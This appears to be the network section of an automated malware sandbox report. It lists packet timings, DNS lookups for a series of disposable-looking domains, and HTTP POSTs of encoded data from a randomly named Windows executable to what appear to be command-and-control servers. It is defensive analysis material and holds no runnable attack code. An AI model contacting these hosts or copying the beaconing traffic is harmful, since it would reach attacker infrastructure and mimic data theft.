Dec 11, 2024 04:51:58.789056063 CET	49936	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:51:59.013286114 CET	49936	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:00.032165051 CET	49942	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:00.151792049 CET	80	49942	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:00.151982069 CET	49942	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:00.167243004 CET	49942	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:00.286675930 CET	80	49942	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:01.447227955 CET	80	49942	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:01.448230982 CET	80	49942	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:01.448282003 CET	49942	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:01.669406891 CET	49942	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:02.688574076 CET	49948	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:02.808310032 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:02.808419943 CET	49948	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:02.823101044 CET	49948	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:02.942742109 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:02.942785978 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:02.942872047 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:02.942926884 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:02.942961931 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:02.943135977 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:02.943146944 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:02.943253994 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:02.943283081 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:04.121299028 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:04.122040033 CET	80	49948	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:04.122102022 CET	49948	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:04.327805042 CET	49948	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:05.344835043 CET	49954	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:05.464221001 CET	80	49954	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:05.464313030 CET	49954	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:05.473501921 CET	49954	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:05.593137980 CET	80	49954	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:06.803153992 CET	80	49954	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:06.804096937 CET	80	49954	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:06.804179907 CET	49954	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:06.806138039 CET	49954	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:52:06.926538944 CET	80	49954	172.67.182.198	192.168.2.4
Dec 11, 2024 04:52:12.566675901 CET	49975	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:12.685909033 CET	80	49975	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:12.686016083 CET	49975	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:12.701015949 CET	49975	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:12.820301056 CET	80	49975	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:13.920367002 CET	80	49975	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:13.920598984 CET	80	49975	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:13.920650005 CET	49975	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:14.216487885 CET	49975	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:15.235264063 CET	49981	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:15.354604006 CET	80	49981	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:15.354712009 CET	49981	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:15.370254040 CET	49981	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:15.489778996 CET	80	49981	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:16.584924936 CET	80	49981	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:16.585063934 CET	80	49981	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:16.585114956 CET	49981	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:16.872575045 CET	49981	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:17.891499043 CET	49987	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:18.010811090 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:18.011008978 CET	49987	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:18.026133060 CET	49987	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:18.145515919 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:18.145580053 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:18.145642996 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:18.145703077 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:18.145746946 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:18.145755053 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:18.145859003 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:18.145867109 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:18.145876884 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:19.304116964 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:19.304214954 CET	80	49987	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:19.304264069 CET	49987	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:19.528819084 CET	49987	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:20.547718048 CET	49993	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:20.668046951 CET	80	49993	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:20.668129921 CET	49993	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:20.678031921 CET	49993	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:20.797313929 CET	80	49993	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:21.917340994 CET	80	49993	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:21.917355061 CET	80	49993	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:21.917490005 CET	49993	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:21.920087099 CET	49993	80	192.168.2.4	209.74.79.40
Dec 11, 2024 04:52:22.039293051 CET	80	49993	209.74.79.40	192.168.2.4
Dec 11, 2024 04:52:27.634923935 CET	50014	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:27.754169941 CET	80	50014	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:27.754273891 CET	50014	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:27.769006014 CET	50014	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:27.888401031 CET	80	50014	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:29.278826952 CET	50014	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:29.341694117 CET	80	50014	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:29.341747999 CET	50014	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:29.341872931 CET	80	50014	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:29.341918945 CET	50014	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:29.398046017 CET	80	50014	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:29.398118973 CET	50014	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:30.297692060 CET	50020	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:30.417360067 CET	80	50020	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:30.417434931 CET	50020	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:30.431706905 CET	50020	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:30.551366091 CET	80	50020	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:31.935158968 CET	50020	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:32.004187107 CET	80	50020	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:32.004240990 CET	50020	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:32.004317045 CET	80	50020	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:32.004363060 CET	50020	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:32.055771112 CET	80	50020	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:32.055844069 CET	50020	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:32.959971905 CET	50026	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:33.079354048 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:33.079431057 CET	50026	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:33.095495939 CET	50026	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:33.214936972 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:33.214972973 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:33.214984894 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:33.215066910 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:33.215075016 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:33.215157032 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:33.215167046 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:33.215285063 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:33.215297937 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:34.606925964 CET	50026	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:34.676851988 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:34.676932096 CET	50026	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:34.726712942 CET	80	50026	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:34.726797104 CET	50026	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:35.625827074 CET	50031	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:35.745182037 CET	80	50031	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:35.745270967 CET	50031	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:35.753976107 CET	50031	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:35.873214006 CET	80	50031	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:37.334223032 CET	80	50031	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:37.334254026 CET	80	50031	13.228.81.39	192.168.2.4
Dec 11, 2024 04:52:37.334498882 CET	50031	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:37.337327003 CET	50031	80	192.168.2.4	13.228.81.39
Dec 11, 2024 04:52:37.456666946 CET	80	50031	13.228.81.39	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 04:50:39.559731960 CET	60836	53	192.168.2.4	1.1.1.1
Dec 11, 2024 04:50:40.407747984 CET	53	60836	1.1.1.1	192.168.2.4
Dec 11, 2024 04:50:55.158163071 CET	63406	53	192.168.2.4	1.1.1.1
Dec 11, 2024 04:50:56.153743982 CET	63406	53	192.168.2.4	1.1.1.1
Dec 11, 2024 04:50:56.747701883 CET	53	63406	1.1.1.1	192.168.2.4
Dec 11, 2024 04:50:56.747736931 CET	53	63406	1.1.1.1	192.168.2.4
Dec 11, 2024 04:51:11.563601971 CET	61728	53	192.168.2.4	1.1.1.1
Dec 11, 2024 04:51:12.333903074 CET	53	61728	1.1.1.1	192.168.2.4
Dec 11, 2024 04:51:26.735516071 CET	57405	53	192.168.2.4	1.1.1.1
Dec 11, 2024 04:51:27.057224989 CET	53	57405	1.1.1.1	192.168.2.4
Dec 11, 2024 04:51:41.750368118 CET	53292	53	192.168.2.4	1.1.1.1
Dec 11, 2024 04:51:42.354305029 CET	53	53292	1.1.1.1	192.168.2.4
Dec 11, 2024 04:51:56.970279932 CET	60250	53	192.168.2.4	1.1.1.1
Dec 11, 2024 04:51:57.366693020 CET	53	60250	1.1.1.1	192.168.2.4
Dec 11, 2024 04:52:11.813760042 CET	62093	53	192.168.2.4	1.1.1.1
Dec 11, 2024 04:52:12.564165115 CET	53	62093	1.1.1.1	192.168.2.4
Dec 11, 2024 04:52:26.938442945 CET	50009	53	192.168.2.4	1.1.1.1
Dec 11, 2024 04:52:27.632389069 CET	53	50009	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 11, 2024 04:50:39.559731960 CET	192.168.2.4	1.1.1.1	0x7dcc	Standard query (0)	www.wuyyv4tq.top	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:50:55.158163071 CET	192.168.2.4	1.1.1.1	0xfe94	Standard query (0)	www.313333.xyz	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:50:56.153743982 CET	192.168.2.4	1.1.1.1	0xfe94	Standard query (0)	www.313333.xyz	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:51:11.563601971 CET	192.168.2.4	1.1.1.1	0xd4f0	Standard query (0)	www.mosquitoxp.lol	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:51:26.735516071 CET	192.168.2.4	1.1.1.1	0x565e	Standard query (0)	www.mzkd6gp5.top	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:51:41.750368118 CET	192.168.2.4	1.1.1.1	0x6d8a	Standard query (0)	www.epayassist.net	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:51:56.970279932 CET	192.168.2.4	1.1.1.1	0x80a1	Standard query (0)	www.grimbo.boats	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:52:11.813760042 CET	192.168.2.4	1.1.1.1	0xcc07	Standard query (0)	www.balanpoint.life	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:52:26.938442945 CET	192.168.2.4	1.1.1.1	0x44c4	Standard query (0)	www.erexolsk.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 11, 2024 04:50:40.407747984 CET	1.1.1.1	192.168.2.4	0x7dcc	No error (0)	www.wuyyv4tq.top		156.226.63.13	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:50:56.747701883 CET	1.1.1.1	192.168.2.4	0xfe94	No error (0)	www.313333.xyz		103.120.80.111	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:50:56.747736931 CET	1.1.1.1	192.168.2.4	0xfe94	No error (0)	www.313333.xyz		103.120.80.111	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:51:12.333903074 CET	1.1.1.1	192.168.2.4	0xd4f0	No error (0)	www.mosquitoxp.lol		38.180.232.109	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:51:27.057224989 CET	1.1.1.1	192.168.2.4	0x565e	No error (0)	www.mzkd6gp5.top		172.67.158.81	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:51:27.057224989 CET	1.1.1.1	192.168.2.4	0x565e	No error (0)	www.mzkd6gp5.top		104.21.65.44	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:51:42.354305029 CET	1.1.1.1	192.168.2.4	0x6d8a	No error (0)	www.epayassist.net		208.91.197.27	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:51:57.366693020 CET	1.1.1.1	192.168.2.4	0x80a1	No error (0)	www.grimbo.boats		172.67.182.198	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:51:57.366693020 CET	1.1.1.1	192.168.2.4	0x80a1	No error (0)	www.grimbo.boats		104.21.18.171	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:52:12.564165115 CET	1.1.1.1	192.168.2.4	0xcc07	No error (0)	www.balanpoint.life		209.74.79.40	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:52:27.632389069 CET	1.1.1.1	192.168.2.4	0x44c4	No error (0)	www.erexolsk.shop	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 11, 2024 04:52:27.632389069 CET	1.1.1.1	192.168.2.4	0x44c4	No error (0)	dns.ladipage.com		13.228.81.39	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:52:27.632389069 CET	1.1.1.1	192.168.2.4	0x44c4	No error (0)	dns.ladipage.com		18.139.62.226	A (IP address)	IN (0x0001)	false
Dec 11, 2024 04:52:27.632389069 CET	1.1.1.1	192.168.2.4	0x44c4	No error (0)	dns.ladipage.com		54.179.173.60	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.wuyyv4tq.top

www.313333.xyz

www.mosquitoxp.lol

www.mzkd6gp5.top

www.epayassist.net

www.grimbo.boats

www.balanpoint.life

www.erexolsk.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	156.226.63.13	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:50:40.606653929 CET	538	OUT	GET /0qmw/?gnlxDxt=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk=&Cpbp2=zjh46zEHi HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.wuyyv4tq.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Dec 11, 2024 04:50:45.119699001 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 11 Dec 2024 03:50:44 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49779	103.120.80.111	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:50:56.996035099 CET	797	OUT	POST /5jna/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.313333.xyz Origin: http://www.313333.xyz Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Referer: http://www.313333.xyz/5jna/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 67 4f 53 49 6c 75 68 39 54 4c 6d 59 49 4d 30 51 4f 54 6f 77 64 70 56 56 62 52 57 76 6c 33 6b 68 44 52 52 59 73 43 52 57 70 65 61 69 50 4c 61 76 78 47 61 38 4b 58 49 42 35 43 4a 69 37 44 43 6c 57 41 4e 68 35 35 62 67 74 4b 65 33 54 6f 48 77 44 57 56 66 32 79 78 44 46 79 46 49 34 61 58 56 52 73 4f 66 58 49 46 4f 4e 46 6b 4f 39 36 44 74 74 7a 76 70 36 59 70 59 6c 48 64 6c 59 61 52 44 74 63 6d 4a 42 70 74 76 6a 50 67 42 6a 68 37 76 63 55 58 4d 6a 6f 34 69 64 6c 63 6c 32 55 6a 61 6c 56 71 76 54 41 33 30 72 2f 37 7a 33 44 4b 64 65 6a 6a 58 70 67 3d 3d Data Ascii: gnlxDxt=l+uQF2GaIYZVgOSIluh9TLmYIM0QOTowdpVVbRWvl3khDRRYsCRWpeaiPLavxGa8KXIB5CJi7DClWANh55bgtKe3ToHwDWVf2yxDFyFI4aXVRsOfXIFONFkO96Dttzvp6YpYlHdlYaRDtcmJBptvjPgBjh7vcUXMjo4idlcl2UjalVqvTA30r/7z3DKdejjXpg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49785	103.120.80.111	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:50:59.656758070 CET	817	OUT	POST /5jna/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.313333.xyz Origin: http://www.313333.xyz Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Referer: http://www.313333.xyz/5jna/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 68 75 43 49 6e 4f 64 39 44 62 6d 62 48 73 30 51 42 7a 6f 30 64 75 64 56 62 54 36 5a 6d 46 41 68 44 78 68 59 74 47 39 57 71 65 61 69 46 72 61 71 2b 6d 61 72 4b 58 46 30 35 48 68 69 37 44 47 6c 57 41 64 68 34 49 62 6a 74 61 65 35 61 49 48 79 4d 32 56 66 32 79 78 44 46 79 35 6d 34 63 2f 56 52 63 2b 66 55 71 68 52 45 6c 6b 4e 72 71 44 74 37 7a 76 74 36 59 70 32 6c 43 30 43 59 59 35 44 74 5a 61 4a 42 59 74 6f 74 2f 67 59 73 42 36 49 63 6b 2b 46 6a 4c 64 7a 62 48 38 58 2f 51 58 69 74 7a 6e 31 43 78 57 6a 35 2f 66 41 71 45 44 70 54 67 65 65 79 75 44 63 58 7a 66 72 4b 64 4a 61 64 54 6e 59 52 49 7a 57 35 38 45 3d Data Ascii: gnlxDxt=l+uQF2GaIYZVhuCInOd9DbmbHs0QBzo0dudVbT6ZmFAhDxhYtG9WqeaiFraq+marKXF05Hhi7DGlWAdh4Ibjtae5aIHyM2Vf2yxDFy5m4c/VRc+fUqhRElkNrqDt7zvt6Yp2lC0CYY5DtZaJBYtot/gYsB6Ick+FjLdzbH8X/QXitzn1CxWj5/fAqEDpTgeeyuDcXzfrKdJadTnYRIzW58E=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49792	103.120.80.111	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:02.324479103 CET	10899	OUT	POST /5jna/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.313333.xyz Origin: http://www.313333.xyz Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10304 Referer: http://www.313333.xyz/5jna/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 68 75 43 49 6e 4f 64 39 44 62 6d 62 48 73 30 51 42 7a 6f 30 64 75 64 56 62 54 36 5a 6d 46 49 68 43 43 70 59 73 6e 39 57 72 65 61 69 47 72 61 72 2b 6d 62 70 4b 58 64 77 35 48 6c 59 37 41 75 6c 58 6a 6c 68 78 64 37 6a 69 61 65 35 59 49 48 2f 44 57 56 47 32 32 64 48 46 7a 56 6d 34 63 2f 56 52 65 57 66 41 6f 46 52 49 46 6b 4f 39 36 44 68 74 7a 76 46 36 59 77 4c 6c 43 77 34 59 6f 5a 44 74 39 47 4a 61 4f 52 6f 72 76 67 4e 6c 52 36 51 63 6b 69 47 6a 4c 42 2f 62 44 31 4b 2f 58 2f 69 76 43 58 6a 52 43 37 31 6c 64 37 6a 36 56 72 36 65 79 57 37 70 39 58 4a 51 52 66 69 56 66 49 32 5a 30 44 55 54 39 36 58 72 62 71 65 48 52 55 45 6b 65 65 49 4c 52 31 77 41 32 42 53 52 38 6f 63 55 58 78 54 6a 52 72 2b 6c 76 5a 6d 53 73 55 4b 69 6a 4a 45 46 71 61 47 4d 63 42 6f 6d 59 30 43 79 77 71 39 62 65 30 4d 63 4a 6c 4b 6b 70 4a 4e 38 2b 56 4e 79 43 4e 43 6d 6e 43 52 65 4d 67 46 72 41 4b 61 78 38 6e 49 6e 32 7a 6d 65 72 4a 54 6f 6a 45 30 64 69 70 66 44 30 4c 77 43 31 [TRUNCATED] Data Ascii: 